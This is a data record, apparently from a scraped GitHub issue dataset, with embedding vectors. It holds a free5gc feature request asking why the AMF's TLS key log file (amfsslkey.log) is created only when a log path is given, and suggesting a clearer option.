0.03362684324383736, 0.0071385446935892105, 0.0001533005852252245, -0.00942942500114441, 0.0059965141117572784, 0.03368138521909714, 0.010663500055670738, 0.006869229953736067, 0.02090427838265896, -0.005260159727185965, -0.013833913952112198, 0.002964166458696127, -0.003265867242589593, -0.011379399336874485, 0.003119278233498335, 0.0034346149768680334, 0.007902171462774277, 0.00829762127250433, 0.00816807709634304, -0.008747614920139313, 0.015613435767591, 0.007424904964864254, -0.0003168283146806061, -0.0078067178837955, -0.025622399523854256, -0.0014445837587118149, 0.006303328089416027, -0.0075680846348404884, -0.020154286175966263, 0.03158141300082207, -0.0019227026496082544, -0.006971501745283604, -0.017795225605368614, -0.013636188581585884, -0.004312444943934679, -0.03507227823138237, 0.012313478626310825, -0.004424943123012781, -0.0025874667335301638, 0.007452177349478006, 0.016949782148003578, -0.028417818248271942, -0.011747576296329498, -0.014454360119998455, 0.0027340559754520655, -0.012088481336832047 ]
null
null
null
null
null
null
null
null
null
[ "free5gc", "free5gc" ]
I need the XXXsslkey.log file, but it wasn't generated as default. (v3.4.0) I started the AMF with the following option: ./bin/amf -l log/amf.log By doing this, the following two files were generated log/amf.log log/key/amfsslkey.log I find it counterintuitive that log/key/amfsslkey.log is generated with -l log/amf.log. Is this the expected behavior? I think it would be better to have sslkey.log created by default or to have a more intuitive option for specifying its creation.
[Feat]Options for Creating an sslkey.log
https://api.github.com/repos/free5gc/free5gc/issues/549/comments
1
2024-03-23T05:23:13
2024-05-31T04:48:45Z
https://github.com/free5gc/free5gc/issues/549
2,203,704,386
549
false
This is a GitHub Issue repo:free5gc owner:free5gc Title : [Feat]Options for Creating an sslkey.log Issue date: --- start body --- I need the XXXsslkey.log file, but it wasn't generated as default. (v3.4.0) I started the AMF with the following option: ./bin/amf -l log/amf.log By doing this, the following two files were generated log/amf.log log/key/amfsslkey.log I find it counterintuitive that log/key/amfsslkey.log is generated with -l log/amf.log. Is this the expected behavior? I think it would be better to have sslkey.log created by default or to have a more intuitive option for specifying its creation. --- end body ---
646
[ 0.009649082086980343, 0.02993008866906166, -0.013307841494679451, 0.0007330970838665962, 0.019843390211462975, 0.0016509256092831492, -0.0016374742845073342, 0.048984333872795105, -0.055240098387002945, 0.01816466636955738, 0.005430747289210558, -0.00998626183718443, -0.015079828910529613, 0.01509417686611414, 0.0018939462024718523, 0.0014267369406297803, -0.02809353545308113, 0.013228926807641983, -0.009118203073740005, -0.0170455165207386, -0.0027458632830530405, 0.02226821519434452, -0.010079524479806423, 0.06496809422969818, -0.0009079642477445304, -0.024635648354887962, -0.013616325333714485, 0.006033366546034813, -0.0546087808907032, -0.00727806193754077, 0.006840445566922426, 0.01007235050201416, -0.037075430154800415, 0.012776962481439114, 0.00021264298993628472, 0.015208961442112923, 0.01720334403216839, 0.03655890002846718, -0.0396580845117569, 0.03483713045716286, -0.03687455877661705, -0.0170455165207386, 0.0022705832961946726, -0.043044231832027435, -0.01539548672735691, -0.009225813671946526, -0.02040296606719494, 0.02737613208591938, -0.04094941169023514, 0.012755440548062325, 0.02529565989971161, -0.02820831909775734, -0.022928226739168167, -0.025912627577781677, 0.0025431967806071043, -0.026615682989358902, 0.0201877448707819, -0.027835270389914513, -0.011772597208619118, 0.01017996110022068, -0.0024212379939854145, 0.0009640114149078727, -0.01293479185551405, 0.01568244770169258, -0.00022519755293615162, 0.000001747971282384242, -0.03896937891840935, 0.0005035278154537082, -0.04622950404882431, 0.016772901639342308, -0.012181517668068409, 0.04321640729904175, 0.03868241608142853, 0.014807215891778469, -0.020560795441269875, 0.018623804673552513, 0.057794053107500076, 0.046286895871162415, -0.010280397720634937, 0.004910629242658615, -0.019986871629953384, -0.006252174731343985, -0.031967516988515854, -0.027103517204523087, 0.07219952344894409, 0.0054092248901724815, 0.0003501827595755458, -0.05274353176355362, -0.014061115682125092, 0.0031260873656719923, 0.001293120440095663, -0.021421678364276886, 0.007891442626714706, -0.0015325540443882346, 0.02482217364013195, 0.01059605460613966, -0.03561192750930786, -0.017461609095335007, -0.054092250764369965, 0.008300363086163998, 0.006216304376721382, 0.02000121958553791, -0.018652500584721565, 0.005154546815901995, 0.001468884409405291, 0.019341208040714264, 0.04094941169023514, -0.00231542089022696, 0.006008257158100605, 0.07822571694850922, 0.02630002610385418, -0.0001771090755937621, -0.005724882706999779, -0.02741917595267296, -0.016069846227765083, 0.011083889752626419, 0.004053331911563873, -0.04717647656798363, -0.00998626183718443, 0.016887687146663666, -0.015668099746108055, -0.03133619949221611, -0.008135359734296799, -0.04528253152966499, -0.053661808371543884, 0.046717338263988495, -0.04668864235281944, 0.04011722281575203, -0.0016231262125074863, -0.008149707689881325, -0.03753456845879555, -0.018437279388308525, 0.014161552302539349, 0.03730500116944313, -0.03033183515071869, 0.0028480933979153633, -0.03317275270819664, -0.01269804872572422, -0.05228439345955849, -0.02450651489198208, -0.05018957331776619, -0.07128124684095383, -0.010725188069045544, 0.028839634731411934, 0.013946331106126308, -0.019412947818636894, 0.025769146159291267, -0.021306894719600677, -0.010646273382008076, 0.02262691780924797, -0.012633481994271278, -0.004422794561833143, 0.0020715035498142242, 0.02252648025751114, 0.03896937891840935, -0.017834659665822983, -0.01291326992213726, -0.028810938820242882, -0.01070366520434618, -0.043761637061834335, 0.014993740245699883, -0.019886434078216553, -0.01269804872572422, 0.0048388889990746975, 0.018509019166231155, 0.0018186187371611595, -0.003291090251877904, 0.03291448950767517, -0.019771650433540344, 0.02820831909775734, -0.027175258845090866, -0.015567664057016373, 0.03529626876115799, -0.02090514823794365, -0.04740604758262634, -0.017619438469409943, -0.013587629422545433, 0.013207404874265194, 0.007113059051334858, -0.009692125953733921, 0.0015056513948366046, 0.023803459480404854, -0.017275085672736168, -0.02367432788014412, 0.04215465113520622, -0.006270109675824642, 0.0037807184271514416, -0.023688675835728645, 0.023473454639315605, -0.010280397720634937, 0.03104923851788044, 0.020962540060281754, 0.02079036459326744, 0.01496504433453083, 0.004354641307145357, 0.04393381252884865, 0.01057453267276287, -0.019011201336979866, -0.03291448950767517, -0.004257791675627232, 0.026960037648677826, 0.018049880862236023, -0.06364806741476059, -0.0020159047562628984, -0.019011201336979866, 0.0403754897415638, -0.04338858649134636, 0.04697560518980026, -0.008981896564364433, -0.020732970908284187, -0.04640168324112892, 0.019125986844301224, 0.011184326373040676, 0.01978599838912487, 0.005247809458523989, 0.03302927315235138, 0.008752327412366867, 0.012676525861024857, -0.035238876938819885, -0.040174614638090134, 0.03549714386463165, -0.0038094145711511374, 0.011248892173171043, 0.016242023557424545, -0.026242632418870926, 0.01888206973671913, 0.004953673575073481, -0.005100741516798735, 0.0043367063626646996, 0.018336841836571693, 0.026974385604262352, 0.028724851086735725, -0.015912016853690147, 0.026673074811697006, -0.009254509583115578, 0.0090464623644948, 0.008465365506708622, -0.03334493190050125, 0.025955671444535255, -0.0026830905117094517, -0.015424182638525963, 0.0005089083570055664, -0.026716120541095734, -0.033402323722839355, -0.030877061188220978, -0.01467808336019516, -0.0002068140747724101, 0.015065480954945087, -0.027031777426600456, 0.011004975065588951, -0.0029897806234657764, 0.0034363644663244486, -0.015409834682941437, -0.014484384097158909, -0.014455688185989857, 0.009469730779528618, 0.004648777190595865, 0.014979392290115356, -0.007740787696093321, -0.01909729093313217, 0.027390480041503906, 0.012755440548062325, -0.012224561534821987, 0.02644350565969944, 0.008286014199256897, -0.055096615105867386, -0.026572639122605324, -0.00026566360611468554, 0.016930731013417244, 0.0251521784812212, 0.006363372318446636, -0.01379567664116621, -0.023430410772562027, 0.032254476100206375, -0.004781496711075306, -0.02706047333776951, 0.014089811593294144, -0.0019011201802641153, 0.043159015476703644, -0.022096039727330208, -0.04436425492167473, -0.004340293351560831, 0.038940683007240295, 0.00883124116808176, -0.02618524059653282, 0.017260737717151642, -0.01158607192337513, -0.02749091573059559, -0.05882711708545685, 0.02813657931983471, 0.00578227499499917, 0.016916383057832718, 0.004085614811629057, -0.022827791050076485, -0.0019459580071270466, -0.021880818530917168, 0.04057636111974716, -0.0036264765076339245, 0.02615654468536377, 0.009907347150146961, -0.0037412610836327076, 0.02367432788014412, 0.03500930964946747, 0.007977531291544437, -0.0170455165207386, 0.021579507738351822, 0.0016087781405076385, 0.012002166360616684, -0.010423878207802773, 0.014053941704332829, 0.038797199726104736, -0.05242787301540375, -0.004971608519554138, -0.033086664974689484, -0.0102732228115201, -0.010517140850424767, 0.006531962193548679, -0.027103517204523087, -0.03150837868452072, -0.00342739699408412, -0.015567664057016373, -0.010789753869175911, -0.03202490881085396, -0.01137085072696209, 0.0004178877570666373, -0.014835911802947521, 0.020560795441269875, -0.023903897032141685, 0.006140977144241333, -0.04003113508224487, -0.010237352922558784, 0.005628033075481653, -0.05133742094039917, -0.01530939806252718, -0.013508714735507965, -0.032971881330013275, 0.010452574118971825, -0.003981591202318668, 0.008472539484500885, -0.016672465950250626, 0.016313763335347176, 0.003730500116944313, 0.0002916695084422827, -0.009354946203529835, 0.013393930159509182, 0.01509417686611414, -0.02190951444208622, 0.0027279281057417393, 0.04292944818735123, 0.04691821336746216, 0.0008478816598653793, -0.019326860085129738, 0.02147907204926014, -0.031278807669878006, 0.0066862041130661964, -0.010495618917047977, -0.0023853678721934557, -0.016973774880170822, 0.0011424656258895993, 0.046430379152297974, -0.021536463871598244, -0.011765423230826855, -0.03345971554517746, 0.02277039922773838, -0.0021450375206768513, 0.020532097667455673, -0.03853893652558327, -0.009842781350016594, -0.042039867490530014, -0.04381902888417244, -0.009024940431118011, 0.03526757284998894, -0.008716456592082977, -0.03236926347017288, -0.006585767492651939, -0.010115394368767738, -0.005764340050518513, 0.014778519049286842, -0.02706047333776951, 0.027720484882593155, 0.005280092358589172, -0.012762614525854588, 0.025209572166204453, 0.01003647968173027, -0.01183716394007206, 0.012784136459231377, 0.015352442860603333, 0.006410003639757633, 0.007834049873054028, 0.01756204664707184, -0.048123449087142944, 0.03632933273911476, -0.024334339424967766, -0.03584149852395058, -0.03885459154844284, 0.005559879820793867, -0.02266996167600155, 0.0037807184271514416, 0.036358028650283813, -0.01763378642499447, -0.0031332613434642553, 0.012604786083102226, 0.023616934195160866, 0.03417712077498436, -0.03305796906352043, 0.00061607058160007, -0.03219708427786827, -0.026759164407849312, -0.006894250866025686, 0.00897472258657217, 0.005628033075481653, -0.0011388786369934678, -0.02835180051624775, -0.01070366520434618, 0.02496565505862236, 0.03463625907897949, -0.026472201570868492, 0.008077967911958694, -0.019269468262791634, 0.00439051166176796, -0.0021683531813323498, -0.005660316441208124, -0.014061115682125092, 0.0170455165207386, 0.01237521693110466, -0.002984400140121579, 0.02597001940011978, -0.010158438235521317, 0.025625666603446007, -0.019915131852030754, 0.012633481994271278, 0.0010393388802185655, 0.013896112330257893, -0.023401712998747826, -0.014075463637709618, -0.025453489273786545, -0.058511458337306976, -0.03696064651012421, -0.04608602449297905, 0.007034144829958677, -0.03770674765110016, 0.01289892103523016, 0.023143447935581207, -0.017332477495074272, -0.03773544356226921, 0.000745203229598701, -0.051107849925756454, -0.019986871629953384, -0.026572639122605324, -0.009634734131395817, 0.016572028398513794, 0.031250111758708954, -0.021995602175593376, -0.015295050106942654, 0.0026167305186390877, -0.005961625836789608, 0.00223471294157207, 0.027117865160107613, 0.05899929255247116, 0.006277283653616905, 0.01358045544475317, -0.004968021530658007, 0.03655890002846718, -0.0034919632598757744, 0.0166581179946661, -0.011758249253034592, -0.028696155175566673, -0.03521018102765083, 0.009677777998149395, -0.006632398813962936, -0.0007380291935987771, 0.012511523440480232, 0.013078272342681885, -0.0019280228298157454, -0.00570336077362299, -0.017432913184165955, -0.016787249594926834, -0.029384862631559372, -0.000204908472369425, -0.00171997572761029, 0.01997252367436886, -0.01792074926197529, 0.013731109909713268, 0.05165307968854904, -0.034377992153167725, 0.0018795981304720044, -0.012834355235099792, 0.015424182638525963, -0.009067985229194164, -0.018193362280726433, 0.030704885721206665, -0.007113059051334858, -0.0013056750176474452, -0.00519041670486331, -0.029083551838994026, -0.008321885019540787, 0.0009532503900118172, 0.00232976907864213, 0.02076166681945324, -0.016643770039081573, -0.005592163186520338, 0.0014742648927494884, -0.0018096512649208307, -0.04201117157936096, -0.020173396915197372, 0.018107272684574127, -0.012533045373857021, 0.017404217272996902, -0.004688234068453312, -0.00789861660450697, -0.002991574117913842, -0.03176664188504219, -0.015165917575359344, -0.03810849413275719, 0.004584210459142923, -0.0010626544244587421, -0.008336232975125313, -0.018767284229397774, 0.04806605726480484, 0.00872363056987524, -0.018293797969818115, -0.011829989962279797, -0.015840277075767517, 0.039514604955911636, 0.032684918493032455, 0.006592941470444202, 0.020589491352438927, -0.013616325333714485, 0.010151264257729053, -0.03007357008755207, -0.03285709768533707, 0.015438530594110489, 0.002236506436020136, 0.02565436251461506, 0.010639099404215813, 0.004473012872040272, -0.010151264257729053, -0.002093025716021657, -0.014807215891778469, 0.0009640114149078727, -0.013386756181716919, 0.011593245901167393, -0.027720484882593155, 0.014118507504463196, -0.014807215891778469, -0.011499984189867973, -0.022009950131177902, 0.01248282752931118, 0.0237747635692358, -0.012224561534821987, 0.004698995500802994, -0.019441643729805946, 0.0008541589486412704, -0.0012644242960959673, -0.021852120757102966, 0.005538357887417078, 0.034377992153167725, 0.006592941470444202, -0.01496504433453083, -0.010014957748353481, -0.0072959973476827145, 0.02198125422000885, 0.02784961834549904, -0.00014617103443015367, 0.021565159782767296, 0.012748266570270061, 0.04654516279697418, -0.010165613144636154, -0.023373017087578773, -0.012418260797858238, 0.024147814139723778, 0.003441744949668646, 0.010969105176627636, 0.013444148004055023, -0.01300653163343668, 0.04172420874238014, -0.00018080818699672818, 0.020560795441269875, -0.00861601997166872, -0.013099794276058674, 0.03334493190050125, -0.014792867936193943, 0.01063192542642355, 0.0021253088489174843, -0.045598190277814865, -0.019082942977547646, -0.005111502483487129, -0.003441744949668646, 0.0008205306367017329, -0.025023046880960464, 0.02198125422000885, 0.021019933745265007, -0.020603839308023453, -0.020890800282359123, 0.05584271624684334, -0.01618463173508644, -0.0007308551575988531, 0.02914094552397728, 0.02281344309449196, 0.0048855203203856945, -0.019326860085129738, 0.008694934658706188, 0.048926942050457, -0.019326860085129738, 0.021895166486501694, 0.009892999194562435, -0.0035314206033945084, 0.013063924387097359, -0.016815947368741035, -0.0007272681687027216, -0.01474982313811779, 0.0018293798202648759, 0.023028664290905, -0.0241047702729702, -0.012095429003238678, 0.029384862631559372, 0.036845862865448, 0.01169368252158165, 0.013766979798674583, -0.02133559063076973, 0.029958784580230713, -0.044306863099336624, 0.015538967214524746, -0.027203954756259918, 0.03555453568696976, 0.028122231364250183, -0.0066001154482364655, 0.0001227433094754815, 0.009362120181322098, -0.01509417686611414, -0.04950086772441864, 0.0026848840061575174, -0.026960037648677826, -0.015926364809274673, -0.0020804712548851967, 0.00816405564546585, -0.0072493660263717175, 0.0013325776671990752, 0.0022723767906427383, -0.039198946207761765, -0.007009035907685757, -0.0170168187469244, -0.024090422317385674, 0.022253867238759995, -0.028667457401752472, -0.003891916014254093, -0.024707388132810593, -0.0012151027331128716, 0.018968157470226288, 0.017490306869149208, 0.01978599838912487, 0.006815336644649506, -0.008300363086163998, 0.011334980838000774, 0.035784102976322174, -0.0025844473857432604, -0.0012007546611130238, 0.020919496193528175, 0.0097495187073946, -0.01181564200669527, -0.020446009933948517, 0.005685425363481045, 0.010014957748353481, -0.042326826602220535, 0.0011864065891131759, 0.0009998816531151533, -0.0028624413534998894, -0.011334980838000774, -0.00712382048368454, 0.028193971142172813, 0.013508714735507965, -0.03529626876115799, 0.007313932292163372, -0.011342154815793037, -0.006076410878449678, 0.00765469903126359, 0.005936516914516687, 0.014778519049286842, -0.006585767492651939, 0.010230178944766521, -0.019628169015049934, 0.015596359968185425, -0.02949964627623558, -0.004150181543081999, -0.021464724093675613, 0.007052079774439335, -0.003109945682808757, 0.0009783594869077206, -0.026500899344682693, -0.02993008866906166, 0.003906263969838619, -0.022784747183322906, 0.003773544216528535, 0.00008692916890140623, -0.005965213291347027, 0.002546783769503236, -0.005000304896384478, 0.0030579338781535625, -0.04370424151420593, 0.025094786658883095, -0.017676830291748047, 0.007819701917469501, -0.0035923998802900314, 0.020704274997115135, -0.012834355235099792, 0.0022185714915394783, 0.01071801409125328, -0.004318771418184042, 0.005452269222587347, -0.002605969551950693, -0.011507158167660236, -0.0011397753842175007, -0.014922000467777252, 0.03782153129577637, -0.04485208913683891, 0.010796927846968174, 0.029313120990991592, -0.012066733092069626, -0.006625224836170673, 0.03248404711484909, -0.0009460763540118933, -0.006305980030447245, -0.041752904653549194, -0.02594132348895073, 0.01806422881782055, 0.027261346578598022, -0.012095429003238678, 0.025281311944127083, 0.00714892940595746, 0.006166086066514254, -0.04244161397218704, 0.008687760680913925, 0.003020270261913538, 0.013128490187227726, -0.016127238050103188, -0.0018526954809203744, -0.019958175718784332, 0.02806483954191208, 0.02396128885447979, -0.0003091562248300761, -0.040605057030916214, -0.003974417224526405, -0.001902913791127503, 0.019599473103880882, -0.015639403834939003, 0.018509019166231155, -0.0326562225818634, -0.020087307319045067, -0.039084162563085556, 0.0019674801733344793, 0.022139083594083786, 0.016772901639342308, -0.000941592559684068, -0.03285709768533707, 0.004652364179491997, 0.014721127226948738, 0.03974417224526405, 0.0027099931612610817, 0.0010850733378902078, -0.023028664290905, -0.025840887799859047, 0.029987480491399765, 0.02274170145392418, 0.030274443328380585, 0.0017190789803862572, 0.004218334797769785, 0.0016401645261794329, -0.032684918493032455, -0.01003647968173027, -0.010352137498557568, 0.0028158100321888924, 0.019255120307207108, -0.03400494158267975, -0.055067919194698334, 0.015079828910529613, 0.013164361007511616, -0.004473012872040272, -0.018222058191895485, 0.005854015704244375, 0.015840277075767517, 0.00940516497939825, -0.03323014825582504, -0.0269169919192791, 0.02589827962219715, 0.018552063032984734, -0.017131604254245758, -0.02594132348895073, -0.009125377051532269, 0.008680586703121662, 0.006969578564167023, 0.056933172047138214, -0.019039899110794067, 0.012841529212892056, -0.007805353961884975, 0.009627560153603554, -0.0020356334280222654, 0.016543332487344742, 0.062213264405727386, -0.024850869551301003, 0.00822144839912653, -0.01048844400793314, 0.00809231586754322, 0.0017110082553699613, -0.002568305702880025, 0.016543332487344742, 0.004562688525766134, -0.02744787186384201, -0.0008850970189087093, -0.013178708963096142, 0.016600726172327995, -0.019757302477955818, 0.02097688801586628, 0.007235018070787191, 0.038653720170259476, 0.010753883980214596, -0.0035906063858419657, -0.007633177097886801, -0.0290692038834095, 0.0009989849058911204, 0.040920715779066086, -0.0014608135679736733, 0.015381138771772385, 0.01694507896900177, 0.01661507412791252, 0.03050401248037815, 0.009670604020357132, 0.0000851917066029273, 0.014635038562119007, 0.009907347150146961, -0.010050827637314796, -0.0022992794401943684, -0.025410445407032967, 0.002824777737259865, -0.01523765828460455, -0.03526757284998894, 0.03739108890295029, 0.012203039601445198, -0.014068289659917355, -0.03928503394126892, 0.01289892103523016, -0.02895442023873329, 0.005111502483487129, 0.006123041734099388, -0.012389564886689186, 0.011858685873448849, -0.035095397382974625, -0.024018680676817894, 0.01863815262913704, 0.010194309055805206, -0.002783526899293065, 0.028810938820242882, 0.010058002546429634, -0.009598863311111927, 0.019986871629953384, -0.0026561878621578217, -0.03191012516617775, -0.0255395770072937, 0.011557376012206078, 0.012009340338408947, -0.00936929415911436, 0.017404217272996902, 0.011177152395248413, -0.048295628279447556, -0.022139083594083786, -0.00918994378298521, -0.028193971142172813, -0.00875950139015913, -0.048582591116428375, 0.0005671974504366517, -0.027246998623013496, -0.01345849595963955, -0.03483713045716286, -0.009842781350016594, -0.02147907204926014, 0.009914521127939224, -0.010495618917047977, 0.023014316335320473, -0.004297249019145966, 0.012281954288482666, -0.013745457865297794, -0.0073175192810595036, 0.002824777737259865, -0.049156513065099716, -0.03773544356226921, 0.019527733325958252, -0.00535900704562664, -0.03142228722572327, -0.01356610655784607, -0.0003925544151570648, 0.010854320600628853, -0.012116950936615467, 0.002905485685914755, -0.016428548842668533, -0.009254509583115578, 0.02947095036506653, 0.01236086804419756, 0.001069828518666327, -0.0681820660829544, -0.001503857783973217, 0.009562993422150612, -0.026644378900527954, 0.017289433628320694, 0.007647525053471327, -0.026888296008110046, -0.014907652512192726, -0.03061879612505436, 0.02305736020207405, 0.01827945001423359, 0.000974772498011589, -0.0011227370705455542, -0.007783832028508186, -0.02568305842578411, 0.020245136693120003, -0.0023118339013308287, -0.01942729577422142, 0.04427816718816757, -0.0038309365045279264, 0.03142228722572327, -0.030733581632375717, 0.052542660385370255, 0.021780380979180336, 0.04519644379615784, 0.002220364985987544, -0.007288823369890451, -0.0048460629768669605, -0.03391885384917259, 0.011119759641587734, 0.020029915496706963, -0.010108220390975475, 0.016270719468593597, 0.020876452326774597, -0.02486521750688553, 0.02238300070166588, 0.003622889518737793, 0.023731719702482224, -0.014520253986120224, -0.026213936507701874, 0.016428548842668533, -0.027533959597349167, -0.01455612387508154, 0.019226422533392906, 0.02071862295269966, -0.00446942588314414, -0.023731719702482224, -0.017834659665822983, 0.008286014199256897, 0.020732970908284187, -0.04143724590539932, -0.001198961166664958, 0.025051742792129517, -0.018537715077400208, -0.04057636111974716, -0.0020410139113664627, -0.023186491802334785, -0.003039998933672905, 0.012525871396064758, -0.020345574244856834, -0.011543028056621552, 0.01063192542642355, -0.012647829949855804, -0.0077192652970552444, 0.041609425097703934, -0.01073953602463007, -0.0004499467322602868, -0.02345910668373108, 0.036845862865448, -0.011435417458415031, 0.005653142463415861, -0.013637847267091274, -0.017648134380578995, -0.01172955334186554, -0.013322189450263977, -0.03300057724118233, 0.018968157470226288, -0.012726744636893272, -0.007306758314371109, -0.00816405564546585, 0.0009335217764601111, -0.03767805173993111, 0.012116950936615467, -0.02114906534552574, -0.023573890328407288, -0.0009855335811153054, -0.010294745676219463, -0.005832493305206299, -0.04978782683610916, -0.010014957748353481, -0.01730378158390522, -0.007963182404637337, 0.014161552302539349, 0.019154682755470276, 0.002580860396847129, -0.01059605460613966, 0.0004900764906778932, 0.012368042953312397, -0.025955671444535255, 0.02947095036506653, -0.0005914098001085222, -0.01009387243539095, -0.020704274997115135, -0.01694507896900177, -0.014950696378946304, 0.02744787186384201, -0.02892572432756424, -0.008788197301328182, 0.009763866662979126, -0.0018437278922647238, -0.015782885253429413, -0.023932592943310738, -0.004150181543081999, -0.0006716693751513958, 0.02021644078195095, 0.019398599863052368, 0.008852764032781124, 0.0005878228112123907, 0.030532708391547203, 0.008372102864086628, -0.025381747633218765, 0.023588238283991814, 0.010058002546429634, -0.010495618917047977, 0.000707987928763032, -0.0025916213635355234, 0.03587019443511963, 0.00314402231015265, 0.01403241977095604, -0.01928381621837616, 0.0006254864856600761, 0.011471287347376347, 0.014979392290115356, 0.039342425763607025, -0.04014591872692108, 0.010452574118971825, -0.005194004159420729, 0.0032336979638785124, -0.007475348189473152, -0.023157795891165733, -0.059228863567113876, -0.01680159755051136, 0.013817198574543, 0.014922000467777252, 0.015639403834939003, -0.03079097345471382, 0.008042097091674805, -0.019398599863052368, 0.025482185184955597, -0.013695240020751953, 0.007604480721056461, 0.02312909997999668, -0.0030525533948093653, 0.04465121775865555, -0.009864303283393383, 0.02403302863240242, -0.017131604254245758, 0.007819701917469501, -0.015481575392186642, 0.0018455213867127895, -0.01957077719271183, 0.012439782731235027, 0.023975636810064316, 0.0004990440793335438, -0.026529595255851746, -0.009627560153603554, 0.02097688801586628, -0.014448513276875019, 0.00540563790127635, 0.0067005520686507225, -0.006302393041551113, -0.003210382303223014, 0.012224561534821987, -0.012633481994271278, 0.031537074595689774, 0.029241381213068962, 0.010388008318841457, 0.013264797627925873, 0.0066610947251319885, -0.005064871162176132, -0.006621637847274542, 0.0049393256194889545, -0.023071708157658577, 0.011485636234283447, 0.002017698250710964, 0.02770613692700863, 0.01906859502196312, -0.0297579113394022, 0.007805353961884975, -0.025238268077373505, 0.011865859851241112, -0.009268857538700104, -0.028825286775827408, -0.015165917575359344, -0.01608419418334961, 0.005681838374584913, -0.0055024875327944756, 0.024520864710211754, 0.000853710575029254, 0.03555453568696976, 0.062041085213422775, 0.020603839308023453, -0.023789111524820328, 0.015194613486528397, -0.028767894953489304, -0.01902555115520954, 0.004724104423075914, -0.0014724713983014226, 0.0148933045566082, 0.008737979456782341, 0.00893885176628828, 0.009067985229194164, -0.00996473990380764, -0.0006963300984352827, -0.001145155867561698, 0.018107272684574127, 0.03432060033082962, -0.0038345237262547016, 0.006463808938860893, 0.03799370676279068, 0.004096376243978739, 0.004132246132940054, 0.019656864926218987, -0.00224906112998724, -0.005893472582101822, 0.004121485166251659, 0.004903455264866352, -0.005789448972791433, 0.01820771023631096, -0.009892999194562435, 0.008673412725329399, 0.029671823605895042, -0.008271666243672371, -0.00343995145522058, 0.002912659663707018, 0.012217387557029724, 0.0159694105386734, 0.0020966127049177885, -0.0059974961914122105, -0.009484078735113144, 0.0014366012765094638, -0.002857060870155692, 0.029126597568392754, -0.02536739967763424, -0.00865189079195261, 0.0027548307552933693, 0.018465975299477577, 0.02708916924893856, -0.004250617697834969, 0.006062062457203865, 0.0016921763308346272, -0.006585767492651939, 0.0021504180040210485, -0.0012976041762158275, 0.029700519517064095, -0.00084653653902933, 0.003813001560047269, -0.01300653163343668, -0.007604480721056461, -0.005215526092797518, 0.016098542138934135, 0.015983758494257927, 0.02597001940011978, -0.011987818405032158, 0.005839667282998562, 0.013745457865297794, 0.017475958913564682, -0.0009900173172354698, -0.009146898984909058, 0.007235018070787191, 0.004476599860936403, 0.0024463471490889788, -0.000880613224580884, 0.03446407988667488, 0.015151569619774818, 0.013501540757715702, 0.02100558578968048, -0.013451321981847286, 0.013020879589021206, -0.014792867936193943, 0.015840277075767517, -0.006743596401065588, 0.010761057958006859, -0.015696795657277107, 0.01367371715605259, 0.005484552588313818, 0.0027799399103969336, -0.006255761720240116, 0.003269568085670471, -0.008214274421334267, -0.008737979456782341, -0.004555514547973871, 0.02823701500892639, 0.015883320942521095, 0.008156881667673588, -0.01539548672735691, 0.026644378900527954, 0.01594071462750435, 0.012116950936615467, -0.005466617178171873, -0.0411502867937088, -0.013723935931921005, 0.010789753869175911, -0.018006836995482445, -0.021565159782767296, 0.0030920107383280993, 0.007676221430301666, 0.015625055879354477, 0.029255729168653488, 0.0009007902117446065, -0.007905790582299232, -0.02090514823794365, -0.011083889752626419, -0.024047376587986946, -0.018250754103064537, -0.03615715354681015, 0.000046014731196919456, -0.008235796354711056, 0.011055193841457367, -0.023186491802334785, -0.017174648120999336, 0.0016885893419384956, 0.004053331911563873, -0.007640351075679064, -0.009024940431118011, 0.01942729577422142, -0.0312214158475399, -0.025783494114875793, 0.017619438469409943, 0.018982505425810814, 0.012834355235099792, 0.0005214629345573485, -0.02176603302359581, 0.02112036943435669, 0.02510913461446762, -0.03521018102765083, 0.02536739967763424, -0.009943217039108276, 0.0297579113394022, 0.014548949897289276, -0.025984367355704308, 0.02565436251461506, 0.0023746066726744175, 0.010266048833727837, 0.030733581632375717, -0.00949842669069767, 0.004742039367556572, -0.001320919836871326, 0.008063619025051594, -0.006410003639757633, -0.016500288620591164, -0.019872086122632027, 0.002580860396847129, 0.00219525583088398, 0.02589827962219715, 0.01530939806252718, 0.013422626070678234, -0.028796590864658356, -0.016198979690670967, 0.009333424270153046, 0.01982904225587845, -0.01756204664707184, 0.02334432117640972, 0.013480018824338913, 0.02658698707818985, 0.017059864476323128, 0.005656729452311993, -0.04789388179779053, -0.06169673055410385, -0.029987480491399765, -0.01309262029826641, 0.020116005092859268, 0.001997969811782241, 0.008580150082707405, -0.011076715774834156, 0.0048926942981779575, 0.002614937024191022, -0.03377537429332733, -0.0013585835695266724, -0.014484384097158909, -0.007604480721056461, 0.010244526900351048, -0.001415975857526064, -0.0226986575871706, -0.0026508071459829807, -0.018982505425810814, -0.0016733445227146149, 0.018394235521554947, -0.019326860085129738, 0.002885757014155388, -0.004139420110732317, 0.035238876938819885, 0.024377383291721344, -0.0333736278116703, -0.01759074255824089, -0.013300667516887188, -0.005323136691004038, 0.006162499077618122, 0.030991846695542336, -0.003109945682808757, -0.01604115031659603, -0.004889107309281826, 0.0017101113917306066, 0.04000243917107582, 0.026974385604262352, -0.00832905899733305, 0.003183479653671384, 0.0012429021298885345, 0.06140977144241333, -0.010818449780344963, -0.007956008426845074, -0.0072637139819562435, 0.013063924387097359, 0.01885337382555008, -0.0016598931979387999, 0.00819992646574974, 0.012439782731235027, -0.010388008318841457, -0.019742954522371292, -0.00578227499499917, -0.010553010739386082, 0.0097495187073946, 0.008702108636498451, -0.0038955030031502247, 0.00928320549428463, 0.011428243480622768, 0.045167747884988785, -0.0008411559974774718, 0.010617577470839024, 0.015926364809274673, -0.014491558074951172, -0.018623804673552513, 0.018652500584721565, 0.005653142463415861, -0.004401272628456354, 0.018422931432724, 0.020991237834095955, -0.012038037180900574, 0.013630673289299011, -0.05699056386947632, 0.01885337382555008, 0.014441339299082756, -0.006485330872237682, 0.009663430042564869, 0.017404217272996902, -0.0002643184852786362, 0.017074212431907654, -0.002959290985018015, -0.009885825216770172, 0.01215999573469162, 0.0000900117665878497, 0.011743901297450066, -0.003296470735222101, -0.018968157470226288, 0.009900173172354698, 0.04221204295754433, -0.0017970966873690486, 0.0042829010635614395, 0.00875950139015913, -0.03988765552639961, 0.01866684854030609, -0.012762614525854588, 0.005229874048382044, 0.012547393329441547, -0.020847756415605545, 0.0019047072855755687, 0.0018939462024718523, -0.02529565989971161, 0.009971913881599903, 0.023473454639315605, -0.027046125382184982, -0.012920443899929523, 0.0034722345881164074, -0.020173396915197372, -0.023329973220825195, -0.015295050106942654, -0.004627254791557789, -0.035382356494665146, -0.01763378642499447, 0.0030973912216722965, 0.025051742792129517, 0.04192508012056351, -0.007532740477472544, 